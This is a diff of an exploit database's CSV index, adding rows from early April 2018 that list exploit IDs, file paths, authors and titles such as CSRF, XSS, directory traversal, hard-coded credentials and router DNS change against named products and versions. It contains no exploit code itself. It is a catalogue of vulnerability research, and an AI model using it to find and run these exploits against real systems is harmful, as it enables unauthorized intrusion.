44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php,
-44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
+44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
+44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php,
+44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
+44385,exploits/php/webapps/44385.html,"WampServer 3.1.2 - Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
+44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,
+44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware,
+44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,
+44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
+44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
+44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,